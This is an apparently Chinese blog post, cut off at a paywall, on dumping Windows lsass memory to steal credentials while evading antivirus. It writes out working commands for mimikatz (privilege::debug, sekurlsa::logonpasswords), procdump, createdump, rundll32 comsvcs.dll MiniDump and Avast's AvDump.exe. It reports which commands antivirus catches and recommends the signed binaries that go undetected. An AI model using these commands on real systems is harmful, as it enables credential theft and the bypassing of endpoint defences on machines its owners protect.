本文介绍了如何在有杀软的Windows系统中绕过防护,使用各种工具和技巧来dump lsass进程以获取凭证信息。Mimikatz在有杀软时需免杀,而白名单程序如avdump.exe和DumpMinitool.exe能有效规避查杀。此外,通过SilentProcessExit或编写DLL也可实现lsass内存dump,但前者涉及注册表修改可能触发查杀。
前言
获取Windows用户的凭证信息是渗透过程中至关重要的一步。
没杀软,只要有权限想怎么读就怎么读。
有杀软,得用一些特别的技巧。
注:本机所有测试均为物理机,且为最新版AV
Mimikatz直接读取Lsass进程
权限提升
privilege::debug
抓取密码
sekurlsa::logonpasswords
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BSPqd5Xv-1650257094211)(image-20220411145456534.png)]
但如果此时目标机器上有AV,必定将收到拦截
此时mimikatz必须免杀。
一般来说,目标机器有杀软的存在,更倾向于离线解析密码。
白名单文件dump
首先说三个微软签名的白名单程序
- Procdump.exe
- SQLDumper.exe
- createdump.exe
Procdump.exe(no)
尽管procdump拥有微软签名,但大部分AV厂商对此并不买账。
procdump.exe -ma lsass.exe 1.txt
SQLDumper.exe也是一样的
createdump.exe(no)
createdump.exe随着.NET5出现的,本身是个native binary
虽然有签名同样遭到AV查杀
createdump.exe -u -f lsass.dmp lsass[PID]
Rundll32.exe(no)
使用rundll32直接执行comsvcs.dll的导出函数
MiniDump来Dump进程内存
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id Desktop\lsass-comsvcs.dmp full
同样被查杀
avdump.exe(yes)
AvDump.exe是Avast杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。
默认路径为:
C:\Program Files\Avast Software\Avast
AvDump.exe --pid 980 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp
成功dump并解密,全程数字杀软无感。
DumpMinitool.exe(yes)
此exe为近日mr.d0x的某推上分享了的一个LOLBIN,通过vs2022里的DumpMinitool.exe来导出lsass进程。
最低0.47元/天 解锁文章
164
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
